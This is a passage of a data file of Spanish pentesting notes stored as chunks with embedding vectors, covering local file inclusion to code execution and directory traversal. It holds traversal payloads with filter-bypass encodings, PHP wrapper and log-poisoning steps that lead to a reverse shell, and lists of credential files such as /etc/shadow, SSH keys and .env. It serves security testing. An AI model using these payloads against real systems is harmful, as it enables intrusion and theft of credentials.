-0.08187, -0.02115, 0.04677, -0.00476, 0.02847, -0.00944, 0.05421, 0.022, -0.01807, -0.04257, -0.03006, 0.08158, -0.01687, 0.00456, -0.0084, -0.03179, -0.03391, -0.03954, -0.03895, 0.04894, -0.0944, 0.00721, -0.04872, 0.01028, -0.06712, 0.03345, 0.06656, 0.01439, -0.03352, 0.03629, 0.0052, -0.03501, 0.01621, 0.07288, -0.00024, -0.00295, 0.04751, 0.0086, -0.04097, -0.01709, -0.04134, 0.03963, 0.01924, -0.04287, -0.02291, -0.0202, -0.03183, 0.01084, 0.01964, 0.0014, 0.00302, -0.04466, -0.01258, 0.06217, -0.01871, 0.08077, -0.01663, 0.00147, -0.04807, 0.06118, 0.05803, 0.03394, -0.01359, -0.02014, 0.04152, 0.0509, 0.02277, 0.02448, 0.04651, 0.02869, -0.01939, 0.01587, -0.01604, -0.0446, 0.07168, -0.02777, 0.00857, 0.06337, 0.01192, 0.00916, -0.04163, -0.03928, -0.08036, -0.01789, 0.06056, -0.02201, -0.05431, -0.05417, -0.03346, -0.0578, -0.01457, 0.05344, -0.04805, -0.04064, -0.01082, -0.03042, -0.02325, -0.00809, -0.00198]} +{"tipo": "metodologia", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "texto": "# LFI a RCE\n\n> Local File Inclusion → ejecución de código. Vector clásico de Hacking web. Pariente de Directory traversal (traversal lee; LFI incluye/ejecuta).", "v": [-0.12597, -0.11387, -0.03462, -0.07954, 0.07887, -0.18653, 0.17341, -0.02827, -0.0775, 0.00543, -0.01794, -0.15843, -0.04803, -0.06332, 0.12283, 0.06526, 0.08283, -0.14818, -0.08119, -0.22657, -0.12106, 0.04003, -0.04384, -0.02592, 0.04952, -0.03528, -0.03678, -0.01465, -0.1157, -0.18197, 0.0732, 0.12388, 0.01279, -0.00443, -0.01102, -0.10693, 0.00592, 0.00342, -0.04668, 0.11099, 0.11767, 0.07384, -0.23525, 0.11854, 0.03834, -0.00036, 0.07221, 0.03649, 0.08255, -0.00965, 0.03592, 0.01368, -0.11104, 0.03469, 0.05586, -0.06907, -0.00035, 0.04431, 0.01948, -0.06759, 0.05744, -0.11683, 0.02317, -0.07161, 0.10952, -0.06245, 0.08074, -0.10457, -0.02754, 0.02672, -0.05322, 0.04807, -0.04742, 0.03815, 0.01382, 0.01081, -0.03121, -0.02134, 0.00739, 0.05347, 0.05973, -0.03936, -0.05268, -0.03087, 0.00334, 0.02114, -0.00502, -0.09748, 0.06444, -0.02245, 0.09359, -0.02472, -0.0242, 0.03953, 0.07215, -0.06793, 0.04997, 0.03233, 0.04711, 0.02277, 0.02713, -0.08761, 0.00762, 0.05582, 0.11418, 0.03425, 0.06868, 0.12205, 0.01125, -0.02923, -0.03356, -0.02907, -0.12573, -0.07088, -0.11364, -0.0301, -0.02815, 0.01393, 0.02949, -0.0614, -0.11147, 0.01731, -0.10407, 0.06134, -0.04143, 0.02821, -0.04689, 0.04979, 0.00241, -0.05522, -0.07767, -0.05621, 0.02202, -0.02454, -0.02597, 0.03665, 0.0576, 0.02122, -0.03651, -0.04864, 0.06578, -0.03098, 0.0447, 0.1268, 0.04777, -0.02155, 0.06462, -0.09752, -0.04551, 0.01533, 0.02656, 0.09314, -0.04934, 0.01034, 0.00287, 0.01042, 0.02585, 0.00763, -0.05807, 0.05034, -0.02693, 0.05876, 0.00622, 0.00508, -0.0321, -0.00215, -0.03751, -0.00686, 0.03099, 0.00128, 0.02105, 0.05174, -0.03966, -0.03589, 0.00983, -0.09478, -0.00602, -0.02924, 0.05992, 0.01651, -0.01276, 0.01146, 0.00768, 0.05059, -0.00372, -0.03702, 0.0051, -0.0202, -0.02748, 0.0383, 0.01311, 0.03352, -0.06358, 0.02502, -0.04214, -0.05769, -0.0648, -0.06027, 0.04405, -0.04996, -0.04781, 0.05863, -0.04128, -0.0567, 0.01241, 0.09876, 0.00919, 0.01802, -0.04858, 0.06391, 0.00801, -0.05248, 0.07985, -0.03535, -0.0251, -0.01851, 0.05374, 0.01016, 0.0566, 0.05751, -0.03122, 0.01812, 0.08048, 0.00017, 0.03118, -0.00289, 0.03525, 0.02332, 0.036, -0.01653, -0.00929, 0.0188, -0.00464, -0.04737, 0.05282, 0.06125, -0.02021, 0.01565, -0.05156, -0.07028, 0.0562, 0.04442, -0.01563, -0.08359, -0.04942, -0.01312, -0.0755, -0.03546, 0.01856, 0.02266, -0.01514, 0.02198, -0.01536, -0.08773, -0.02784, -0.01117]} +{"tipo": "metodologia", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "texto": "## Si tienes LFI básico, prueba\n```\n/proc/self/environ # con User-Agent malicioso\n/var/log/apache2/access.log # log poisoning + curl con UA payload\nphp://filter/convert.base64-encode/resource=index.php # leer fuente\ndata://, expect://, phar:// # PHP wrappers\n```", "v": [0.11554, 0.02659, -0.12134, -0.17507, 0.05841, -0.16459, 0.05088, -0.09175, -0.08756, -0.0403, -0.12227, -0.00522, -0.04641, 0.00227, -0.05712, -0.05396, -0.05819, -0.03712, -0.06553, -0.08675, -0.04542, 0.04005, -0.13602, -0.11143, -0.05166, 0.06257, -0.03194, -0.06693, -0.11391, -0.09351, 0.01641, 0.08271, 0.00869, 0.07881, -0.18003, 0.03462, -0.05393, 0.0784, -0.05232, 0.17485, -0.03635, 0.08515, -0.17629, 0.18015, 0.05435, 0.00293, 0.00622, -0.0232, 0.13639, -0.12274, 0.03882, -0.06923, -0.15601, 0.06636, -0.0095, -0.06623, 0.04769, -0.11939, 0.07223, 0.06627, -0.06752, -0.01155, 0.01274, -0.10451, 0.11648, 0.06329, 0.13907, 0.0005, -0.05212, 0.02211, -0.10688, 0.07479, -0.11656, -0.05903, 0.05802, 0.01878, 0.07819, -0.03817, 0.04417, 0.11383, -0.10157, -0.06129, -0.00644, -0.04036, -0.03523, -0.07865, 0.05984, -0.01779, 0.03945, -0.06045, 0.13548, -0.01192, -0.01272, 0.00959, 0.0052, -0.00219, -0.0022, 0.0075, -0.02312, -0.05125, -0.01759, -0.0113, 0.04225, 0.00955, 0.18416, -0.0477, 0.13661, -0.01469, -0.04908, -0.0515, 0.04168, -0.02978, 0.02939, -0.02248, -0.02608, -0.00754, 0.00436, 0.04774, 0.04419, -0.09279, -0.00132, -0.06115, -0.0988, 0.03269, 0.06669, -0.01758, 0.01327, 0.00741, 0.0087, 0.0131, -0.07618, 0.04657, -0.02189, 0.02676, -0.02177, 0.0382, 0.08457, -0.00821, -0.01909, 0.01732, 0.05567, 0.02481, 0.03635, 0.07275, 0.13523, 0.03424, 0.05757, -0.05982, -0.13215, -0.00182, 0.02871, 0.01353, -0.00291, 0.00151, -0.07286, -0.05465, 0.07851, -0.0349, -0.02186, -0.02465, 0.00766, 0.07359, 0.04702, 0.05198, -0.03047, -0.0411, 0.03278, -0.11598, 0.00084, -0.05577, -0.03389, 0.04172, -0.00789, -0.08013, 0.0107, -0.06133, -0.03966, -0.06274, -0.02731, 0.00823, 0.05042, -0.03388, 0.03476, 0.00961, -0.04232, -0.03983, 0.0122, 0.00879, -0.00096, 0.00371, 0.02706, 0.02081, -0.02344, 0.04705, 0.01755, 0.00324, -0.05362, -0.01125, 0.01791, -0.0501, -0.0189, 0.04228, -0.02738, 0.01939, -0.00181, -0.02544, 0.05779, 0.00105, -0.03727, 0.02468, 0.04442, -0.07502, 0.06645, -0.01592, -0.03689, 0.00534, 0.01128, 0.03743, 0.01676, 0.02858, -0.05159, 0.0601, 0.03331, -0.0454, -0.01708, 0.01631, 0.03351, 0.00529, 0.06755, 0.00876, -0.06569, 0.01312, -0.05451, -0.02919, 0.02439, -0.01594, -0.04421, 0.01378, -0.05699, -0.08208, 0.04617, 0.04946, -0.0542, -0.05891, -0.00012, -0.04411, -0.03917, 0.02692, 0.03564, -0.04624, -0.02437, 0.01112, 0.05038, -0.04477, 0.00417, -0.02298]} +{"tipo": "metodologia", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "texto": "## Log poisoning (LFI → RCE)\n1. Envías una petición con `User-Agent: `.\n2. Incluyes el log: `?page=/var/log/apache2/access.log&c=id`.\n3. El PHP de tu UA se ejecuta → RCE → Reverse shell.", "v": [0.00306, 0.03294, -0.0829, -0.10799, 0.05381, -0.13787, -0.04427, -0.02298, -1e-05, 0.07479, -0.18138, -0.12157, -0.05912, -0.05449, 0.07941, -0.0587, -0.10789, 0.0453, -0.08506, -0.065, -0.08468, 0.08433, -0.14632, -0.02246, 0.03106, 0.18126, 0.00721, 0.02212, 0.00668, -0.06314, -0.06058, 0.00292, -0.05269, 0.04123, -0.09749, 0.07494, 0.06032, 0.00443, 0.00286, 0.25009, -0.029, 0.05728, -0.22166, 0.13869, 0.06969, -0.0799, 0.08906, -0.03681, 0.09825, -0.06134, 0.06122, -0.06831, -0.2014, 0.03326, 0.04585, 0.04788, 0.07164, -0.06176, -0.00977, 0.05987, -0.00815, -0.0021, -0.03108, -0.10578, 0.03361, 0.13642, 0.11878, -0.05366, 0.08971, 0.03095, -0.0908, 0.0077, -0.12377, -0.1143, 0.1149, -0.07198, 0.05743, -0.03722, 0.05764, 0.0414, -0.06721, -0.04535, -0.02936, -0.01146, 0.0314, -0.0102, 0.00719, -0.10837, 0.03885, 0.01837, 0.10658, -0.02115, 0.02856, 0.02772, 0.08357, -0.07711, -0.00991, 0.00215, -0.04702, -0.10351, -0.057, 0.04514, 0.02124, 0.04356, 0.04635, -0.08559, 0.04209, -0.00033, -0.00742, -0.01522, 0.09692, -0.10154, -0.00351, -0.00553, -0.06222, 0.09065, 0.00775, -0.01566, 0.02879, -0.05145, -0.01786, -0.08766, -0.10078, -0.00234, 0.0519, -0.01214, -0.02578, 0.03388, -0.00097, -0.03057, -0.0261, -0.00761, -0.03695, 0.02432, 0.00276, -0.00708, 0.02558, 0.04743, -0.04682, 0.06874, 0.02035, 0.03679, 0.0244, 0.03186, 0.1253, 0.01783, 0.041, -0.06612, -0.06469, 0.01284, 0.07033, 0.00988, -0.02568, 0.01816, -0.05126, -0.0567, -0.00838, -0.02395, -0.05761, 0.02724, 0.0445, 0.09932, 0.05678, 0.05445, -0.08413, -0.08401, -0.00981, -0.08199, 0.02892, -0.02131, -0.01391, -0.00743, -0.04044, -0.06256, -0.01468, -0.09001, 0.05714, -0.07462, -0.00128, 0.07478, 0.0465, -0.05482, 0.05188, 0.06071, 0.0036, -0.01176, -0.00738, 0.03431, 0.02212, 0.02012, 0.01538, 0.03528, -0.02029, 0.00449, 0.02746, -0.00578, 0.00985, -0.09398, 0.02986, -0.0631, -0.04528, 0.07497, 0.00786, -0.02878, 0.01961, -0.01924, 0.08275, -0.00549, -0.01399, -0.03781, -0.00396, -0.04863, 0.06122, -0.00108, -0.00971, 0.00059, 0.00422, 0.06905, 0.01883, 0.02464, -0.04716, 0.04986, 0.00494, -0.03285, 0.03319, 0.01038, 0.04864, 0.01093, 0.02921, -0.01564, -0.07239, -0.02548, 0.0187, -0.03979, -0.03493, -0.02989, -0.03411, -0.02897, -0.03613, -0.09851, 0.00378, 0.08189, 0.03172, -0.05993, -0.01078, -0.03861, -0.00506, 0.00745, 0.02881, -0.01486, -0.10652, -0.04526, -0.06153, -0.08674, -0.01271, -0.02066]} +{"tipo": "metodologia", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "texto": "## php://filter\nLee el código fuente en base64 para encontrar credenciales/segundos vectores (SQL injection, creds en config).\n\nRelacionado: Hacking web · Directory traversal · File upload bypass · Reverse shell · OSCP MOC", "v": [0.04537, -0.12973, -0.1507, -0.18249, -0.01896, -0.28265, -0.02413, -0.06069, 0.07692, -0.01525, -0.05971, -0.07427, -0.09137, -0.15983, 0.07063, 0.03423, 0.01271, -0.13271, -0.07495, -0.11695, -0.01841, -0.0619, -0.10206, -0.0457, 0.02395, 0.07608, -0.06285, 0.00815, -0.06856, -0.15559, 0.04795, -0.05113, -0.04254, 0.13773, -0.16086, -0.02741, -0.08853, 0.03088, -0.04767, 0.09381, -0.03858, 0.05562, -0.22124, 0.18929, 0.08817, -0.11116, 0.0767, 0.01687, 0.02194, -0.08601, -0.01246, -0.10375, -0.2202, 0.0473, -0.03348, -0.04513, 0.09126, -0.04775, -0.00158, 0.01043, -0.11552, 0.04115, 0.06063, -0.07926, -0.01467, -0.00043, 0.0332, -0.07289, -0.12738, 0.05564, -0.09561, 0.0805, -0.04195, -0.03924, 0.03896, -0.00878, 0.12188, -0.03461, 0.04968, 0.05945, -0.08425, -0.04638, -0.00106, 0.0259, -0.00755, -0.00733, 0.01933, -0.00237, 0.0008, -0.04526, 0.14141, 0.00294, -0.01939, -0.00411, 0.01345, -0.0569, -0.00929, 0.01104, 0.0236, -0.03228, -0.06025, -0.05823, 0.0101, 0.10981, 0.08818, 0.02091, 0.16883, -0.0382, -0.03148, -0.00352, 0.03326, 0.01552, 0.00128, -0.03061, 0.02951, -0.02507, 0.00893, 0.04252, 0.02359, -0.03081, -0.07442, -0.02328, -0.02142, 0.06451, -0.03612, 0.02701, -0.04401, 0.00894, -0.03695, -0.04292, -0.06159, -0.01121, -0.04784, 0.02943, -0.09988, 0.06511, 0.0492, -0.05373, -0.00396, -0.06627, -0.00202, 0.01505, 0.02073, 0.00998, 0.07556, 0.05399, 0.02501, -0.08303, -0.09677, -0.0583, 0.05873, 0.05794, -0.00224, -0.0354, -0.04319, 0.00407, 0.05736, -0.00652, -0.05403, -0.01151, 0.011, 0.06236, -0.01067, 0.01874, -0.06243, -0.03568, -0.02507, -0.04256, -0.00749, -0.00711, 0.0053, 0.0682, -0.00107, -0.06392, -0.0082, -0.05995, -0.01398, -0.09175, 0.02227, -0.04368, 0.06894, -0.00521, 0.06304, 0.00865, -0.00456, -0.06803, 0.00711, 0.04653, -0.00861, -0.02597, 0.07829, -0.04344, -0.02591, 0.02166, -0.02118, 0.01058, -0.00571, -0.04784, -0.01351, -0.04815, -0.02624, 0.03477, -0.05073, -0.02509, -0.00163, -0.01379, 0.04405, -0.0076, -0.05972, 0.03545, -0.00695, -0.05614, 0.01861, 0.00326, -0.00451, -0.00563, 0.05458, 0.00382, 0.00854, -0.03376, 0.00748, 0.00108, 0.0238, -0.01822, -0.00123, -0.00788, 0.00869, -0.01983, 0.01266, 0.00192, -0.06908, -0.01844, -0.05145, -0.04102, 0.04098, 0.00425, -0.06406, 0.01542, -0.06314, -0.0525, 0.04421, 0.00494, -0.01226, -0.02458, -0.04184, -0.01064, -0.06795, -0.02988, 0.02833, -0.01997, -0.02827, 0.00879, 0.01903, -0.06458, -0.04146, -0.00716]} +{"tipo": "metodologia", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "texto": "# Directory traversal\n\n> Salir del directorio web con `../` para **leer ficheros arbitrarios**. Distinto de LFI a RCE: traversal solo **lee**; LFI **incluye/ejecuta**. Vector de Hacking web.", "v": [-0.00401, -0.16171, -0.21146, 0.00515, 0.14008, -0.12213, 0.08817, -0.02459, -0.0829, 0.06952, 0.01258, -0.1854, -0.04887, -0.18197, 0.1651, 0.00163, 0.03211, -0.09666, -0.10855, -0.15701, 0.04275, 0.06985, -0.04841, 0.02308, -0.03071, -0.02458, 0.0088, -0.05871, -0.13331, -0.05022, 0.07574, 0.08971, 0.05812, -0.05102, -0.01344, -0.08749, -0.01545, 0.0261, -0.01597, 0.21322, 0.12999, 0.0466, -0.18482, 0.09655, 0.02161, -0.07803, 0.05166, -0.01922, 0.1024, 0.00572, 0.16958, 0.03213, -0.04748, 0.07139, 0.06238, -0.0214, 0.06743, 0.00154, 0.07024, -0.05855, 0.03203, -0.12762, 0.00495, -0.04096, 0.10402, -0.04719, 0.07233, -0.11202, -0.04806, 0.01251, -0.06303, 0.05201, 0.01955, -0.01412, 0.04641, 0.01169, 0.00268, 0.00353, 0.01702, 0.01412, -0.0148, -0.10897, -0.06682, -0.02639, -0.01655, -0.02221, 0.03911, -0.09024, 0.0203, -0.07039, 0.08894, 0.02446, -0.05697, -0.07047, -0.00282, -0.08321, 0.02614, 0.00679, 0.05785, -0.05615, 0.01711, 0.01442, -0.0054, 0.10166, 0.11751, 0.02071, 0.04291, 0.11203, -0.00647, -0.0505, 0.01857, 0.00119, -0.04742, -0.08843, -0.00672, -0.02158, -0.01862, 0.02276, 0.04959, -0.08673, -0.03124, -0.05774, -0.09483, 0.04163, -0.02613, -0.01462, -0.06427, 0.04003, 0.01426, -0.01343, -0.04194, -0.07179, -0.07971, -0.0481, -0.03145, 0.03813, 0.01383, -0.01833, 0.00825, -0.03218, 0.06044, -0.01152, 0.0134, 0.07409, 0.06109, -0.04777, 0.04049, -0.0465, -0.08304, -0.00998, 0.02821, 0.12181, 0.00478, 0.0367, 0.02861, -0.05915, 0.06018, -0.04823, -0.03922, 0.02102, -0.01785, 0.03546, 0.05103, 0.06963, -0.05052, 0.00155, -0.08326, -0.04706, 0.01424, 0.02635, -0.04322, 0.03416, -0.06477, -0.01425, -0.0081, -0.07209, -0.01291, -0.07181, 0.05838, 0.00618, 0.0352, 0.00188, 0.0061, 0.04415, -0.10822, -0.04717, -0.00208, -0.03731, -0.00974, 0.07123, 0.03528, 0.06093, -0.0659, 0.00843, -0.03054, -0.00639, -0.06331, -0.10789, 0.0441, -0.03748, -0.02432, 0.0511, -0.03219, -0.028, -0.03915, 0.04847, -0.01054, 0.04274, -0.06286, 0.01388, 0.04391, -0.03873, 0.0614, -0.07097, -0.06237, -0.01027, 0.05764, 0.00747, 0.00882, 0.0424, -0.03479, 0.0601, 0.07627, 0.00095, 0.04843, 0.03335, 0.03316, -0.00965, 0.04016, -0.00481, -0.02949, -0.00017, 0.03622, -0.08258, -0.00179, 0.05466, -0.00332, -0.00846, -0.03971, -0.05423, -0.00365, 0.04872, -0.04783, -0.07134, -0.03574, -0.05602, -0.02729, 0.01602, 0.00323, -0.01019, -0.04925, 0.00959, -0.01972, -0.10294, -0.02409, -0.03464]} +{"tipo": "metodologia", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "texto": "## Dónde\nParámetros que apuntan a ficheros: `?file=`, `?page=`, `?download=`, `?doc=`, `?path=`, `?lang=`.", "v": [-0.02193, 0.145, 0.04782, 0.04985, 0.07655, -0.09754, 0.15697, -0.10547, -0.03011, 0.05152, 0.01548, -0.05506, -0.11953, -0.14659, 0.01376, -0.14591, 0.06136, 0.06136, -0.03673, 0.00117, 0.00587, -0.02484, -0.08739, 0.03748, -0.08566, -0.0558, 0.00734, 0.05347, -0.163, -0.06606, 0.12658, -0.00936, -0.04206, -0.04405, -0.01737, 0.02607, 0.024, 0.01319, -0.01242, 0.12148, -0.07115, -0.04121, -0.12772, 0.14566, -0.03157, -0.08085, -0.00151, 0.02782, 0.07177, -0.06933, 0.01658, 0.04035, 0.07309, 0.05397, -0.02029, -0.13436, 0.1783, 0.04061, 0.01305, -0.0263, 0.01755, 0.08039, 0.01832, -0.02066, 0.10566, -0.02466, 0.16651, -0.05656, -0.01895, 0.02419, -0.11067, 0.055, -0.02068, -0.01834, 0.00322, -0.00237, 0.0646, -0.0952, 0.08605, 0.10063, -0.01488, -0.10974, -0.05361, -0.02231, -0.01516, -0.10971, 0.19322, 0.04136, -0.03398, -0.0956, 0.11044, 0.00826, 0.01911, -0.02508, -0.02145, -0.06346, -0.00775, 0.05988, 0.08, 0.01088, -0.01589, 0.05816, -0.00203, 0.04199, 0.08191, 0.12338, 0.0216, -0.01543, -0.01071, -0.01244, 0.07533, 0.01787, 0.14371, -0.01794, -0.02963, 0.006, -0.06703, 0.05406, -0.05187, -0.08196, 0.00279, -0.05585, -0.0992, 0.02455, -0.03983, -0.09842, -0.09131, 0.04967, -0.06771, 0.03956, -0.00959, 0.02353, -0.08579, -0.01993, -0.04085, -0.00598, 0.04765, -0.01135, -0.00307, -0.02155, 0.09059, -0.00126, 0.0243, 0.02836, 0.00304, 0.00722, 0.03208, -0.07455, -0.10407, -0.05522, 0.0356, 0.06173, 0.01518, 0.00437, 0.04659, -0.02437, 0.02733, -0.04204, -0.00654, -0.05938, 0.03236, 0.09133, 0.07063, -0.00408, 0.00241, -0.04776, -0.04288, -0.05418, 0.06679, -0.04776, -0.03869, 0.01512, -0.06675, -0.10503, 0.04448, -0.08862, -0.00137, -0.0241, 0.01963, 0.00797, 0.02958, -0.05463, -0.01453, 0.04805, -0.07816, -0.00728, 0.03631, -0.02938, 0.04321, 0.01671, 0.02398, 0.03344, -0.07678, -0.0253, -0.0324, -0.00644, -0.07045, -0.02355, 0.06322, -0.02137, -0.02645, -0.05897, -0.02526, -0.04145, 0.04546, 0.05305, -0.05477, 0.02758, -0.07599, -0.00815, -0.00568, -0.03947, 0.05748, -0.03329, -0.04669, -0.05872, 0.03447, 0.05033, 0.00961, -0.04976, -0.01874, 0.09651, 0.08039, -0.02268, 0.03718, 0.04947, 0.08796, 0.01141, 0.02938, 0.06188, -0.08728, 0.04853, -0.01879, -0.03368, 0.06267, 0.03283, -0.02304, -0.0009, -0.08957, -0.08956, 0.00563, 0.0763, -0.05453, -0.06575, -0.07997, -0.03739, -0.08808, 0.02451, 0.05923, -0.08334, -0.06082, -0.01582, 0.06931, -0.01924, 0.07058, -0.08447]} +{"tipo": "metodologia", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "texto": "## Payloads\n```\n../../../../etc/passwd\n....//....//....//etc/passwd (bypass de filtro que quita \"../\")\n%2e%2e%2f%2e%2e%2fetc%2fpasswd (URL-encode)\n%252e%252e%252f (doble URL-encode)\n/etc/passwd (ruta absoluta directa)\n..%c0%af..%c0%af (UTF-8 overlong)\n```", "v": [0.10964, -0.06135, -0.17324, 0.07306, 0.01516, -0.05921, -0.00272, -0.02055, -0.02548, 0.04247, -0.15361, -0.18341, -0.03538, 0.04663, -0.0899, -0.08613, 0.02387, -0.02101, 0.02702, -0.03844, -0.00018, -0.00792, -0.01275, -0.06695, -0.08034, 0.0235, 0.03702, -0.01326, -0.08302, -0.04135, 0.14389, 0.10251, -0.0623, -0.06372, -0.0378, 0.0755, 0.02826, 0.19322, -0.00246, 0.08818, 0.02351, -0.02808, -0.11737, 0.07477, -0.0637, -0.09883, -0.04883, 0.07161, 0.11079, -0.00325, 0.02398, -0.05505, -0.04586, -0.01329, 0.02482, -0.04477, 0.11792, 0.03379, -0.12523, 0.0102, 0.0756, 0.13313, -0.02944, -0.03063, 0.02248, -0.0184, 0.05519, -0.04803, -0.06954, 0.05179, -0.0474, 0.02894, 0.01222, -0.0046, 0.051, -0.0466, 0.03558, -0.01029, 0.11014, 0.09225, -0.03392, -0.06105, -0.06302, -0.09513, 0.02005, -0.04924, 0.07164, -0.04164, -0.05568, 0.03182, 0.04547, -0.00913, -0.01341, -0.00482, -0.02208, -0.06925, -0.03243, 0.01796, 0.08634, -0.05494, 0.02268, -0.00319, -0.00752, 0.0792, 0.0721, 0.07398, 0.091, -0.02739, -0.0676, 0.02232, 0.05895, -0.00617, 0.03483, -0.14855, -0.03538, 0.01499, -0.09889, -0.02039, 0.05225, 0.00302, -0.03922, 0.00291, -0.06347, 0.01645, -0.03672, -0.01039, -0.06789, 0.06637, -0.02238, 0.01076, 0.0004, 0.07411, -0.05674, 0.04705, -0.10218, 0.00872, 0.06746, -0.04188, 0.01218, 0.02005, 0.10416, 0.05003, -0.0033, 0.10852, 0.1271, 0.09293, 0.05061, -0.06043, -0.15029, 0.10159, -0.09088, 0.03829, -0.01491, 0.03066, -0.00072, 0.00784, 0.00926, -0.09823, -0.03416, 0.04994, -0.08332, 0.02145, 0.04312, 0.01899, -0.07282, -0.02531, -0.01744, -0.08857, -0.00394, -0.17441, -0.0145, 0.02584, 0.01106, -0.04635, 0.00991, -0.09231, 0.05996, -0.05719, 0.05087, -0.01464, 0.05925, -0.01449, 0.02787, 0.07607, -0.02452, -0.02397, 0.01679, 0.00225, -0.00155, 0.12678, 0.02798, -0.02539, 0.02116, 0.03187, -0.05264, 0.04512, -0.01276, 0.03875, 0.01072, -0.01381, -0.02811, 0.00256, -0.06408, 0.0452, -0.02801, -0.00973, -0.00285, -0.01165, -0.06121, -0.00332, -0.01126, -0.09099, 0.03038, -0.0512, -0.05501, 0.03421, -0.01098, 0.06841, 0.0377, -0.01375, 0.04143, 0.09537, 0.02674, 0.07577, 0.05705, 0.0818, 0.02001, 0.00741, 0.05009, 0.06948, -0.15156, 0.01272, -0.01163, -0.03388, 0.05033, 0.05179, -0.06584, -0.09758, -0.06967, -0.10827, 0.11806, 0.02626, -0.00293, -0.08254, -0.07384, -0.05737, -0.10675, 0.03705, 0.02026, -0.05367, -0.08594, -0.03322, -0.00509, -0.05776, 0.02848, -0.04638]} +{"tipo": "metodologia", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "texto": "## Windows\n```\n..\\..\\..\\..\\windows\\win.ini\n..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts\n```", "v": [0.23423, 0.04093, 0.04431, -0.0319, 0.07093, -0.06457, -0.10835, -0.06307, 0.06178, -0.11488, -0.0092, -0.15287, -0.06497, 0.00713, -0.06832, 0.01554, -0.0158, -0.03404, 0.01179, 0.02547, -0.0176, -0.03382, -0.06471, -0.00285, 0.00685, -0.01735, 0.00158, 0.04372, -0.20532, 0.04737, 0.02914, -0.04169, -0.03541, -0.08184, -0.04488, 0.02931, -0.09914, 0.10208, 0.0669, 0.14989, 0.02172, 0.11614, -0.04525, 0.14351, 0.05622, -0.11312, 0.02711, -0.045, 0.06466, -0.10149, -0.03298, -0.06476, 0.00546, -0.05321, 0.14453, -0.07028, 0.09399, 0.00072, -0.0137, 0.05802, -0.00464, 0.15309, -0.09208, 0.02131, 0.06567, 0.02838, 0.08956, -0.05614, 0.03076, 0.12512, -0.14311, 0.00338, 0.04388, -0.01844, 0.07551, -0.02104, -0.05191, -0.00666, 0.12215, -0.00244, 0.00161, 0.02438, -0.02425, -0.0712, 0.03368, -0.14627, 0.03824, -0.08316, -0.00611, -0.09204, 0.11236, -0.05412, -0.02803, 0.08877, 0.0095, -0.12014, 0.03663, 0.05154, 0.04979, -0.00154, -0.01265, -0.04925, -0.03825, 0.07259, 0.02672, 0.06317, 0.01681, -0.10455, -0.04973, -0.04537, 0.07948, 0.03433, 0.03738, -0.05733, -0.05098, -0.0358, -0.05576, 0.03374, 0.0249, 0.02326, -0.06389, -0.04173, -0.03459, 0.03232, -0.00742, -0.11397, -0.05164, 0.08004, -0.03307, 0.0656, 0.02733, -0.00316, -0.07084, -0.02453, -0.09962, 0.09705, 0.02062, -0.01109, 0.08896, -0.03703, 0.16956, 0.11828, 0.05768, 0.01942, 0.04798, 0.08275, 0.03418, -0.02928, -0.08508, -0.01973, 0.03972, -0.00286, -0.0668, 0.04832, -0.01231, 0.00642, 0.01795, 0.06497, 0.04528, -0.05878, 6e-05, 0.00014, -0.03818, 0.05053, -0.03458, -0.0513, -0.02799, 0.01719, 0.08455, -0.08044, -0.05106, 0.07432, -0.08857, -0.03386, -0.03436, -0.00206, 0.02671, -0.04436, -0.03, -0.049, -0.06745, 0.01952, 0.02173, -0.00752, -0.08242, 0.04933, -0.05249, 0.00549, -0.03799, -0.00235, -0.06152, -0.0078, -0.0179, -0.02605, 0.02601, -0.03118, -0.06552, -0.04402, 0.09526, 0.01842, -0.10384, -0.01549, -0.01013, -0.0464, 0.10153, 0.03303, -0.04635, 0.0672, 0.06993, 0.03816, -0.01091, -0.0056, 0.00041, -0.02891, -0.02663, -0.06478, 0.07398, 0.01975, -0.0032, -0.03212, 0.02456, 0.08242, 0.02513, 0.00052, 0.01509, 0.04112, -0.02576, 0.02204, 0.04673, -0.01526, -0.09511, -0.01759, 0.01614, -0.03514, 0.03381, 0.03252, -0.02347, -0.0901, -0.03268, -0.04127, -0.03899, 0.05758, -0.01289, -0.1075, -0.08348, -0.05493, -0.04435, -0.00334, 0.07444, -0.09366, -0.01687, 0.02409, 0.0087, -0.07268, -0.00247, 0.01479]} +{"tipo": "metodologia", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "texto": "## Ficheros jugosos\n```\n/etc/passwd /etc/shadow /etc/hosts\n~/.ssh/id_rsa → login SSH directo\nconfig.php web.config .env → credenciales de BD\n/var/www/html/... → código fuente (busca creds, segundos vectores)\n```", "v": [0.05973, -0.11693, -0.20881, -0.00814, 0.0082, -0.22262, -0.06927, -0.18038, 0.1097, -0.00717, -0.21041, -0.05784, -0.09751, -0.19631, 0.08458, -0.0038, 0.11669, -0.08711, -0.0201, 0.06263, -0.00347, -0.03136, -0.0435, -0.03788, -0.00204, -0.02279, 0.06426, 0.11253, -0.13875, 0.03774, 0.01369, -0.03903, 0.03581, 0.07018, -0.09258, 0.0418, -0.03158, 0.11843, -0.06535, 0.13776, -0.01824, 0.01478, -0.03631, 0.02123, 0.09786, -0.17655, 0.03962, 0.00993, -0.03171, -0.08133, 0.0196, -0.09618, -0.17202, -0.03022, -0.0075, -0.06301, 0.18558, -0.15228, -0.02849, -0.01097, -0.07617, 0.14766, -0.00585, -0.02032, 0.0382, 0.03425, 0.02726, -0.06034, -0.07256, -0.01831, -0.19075, 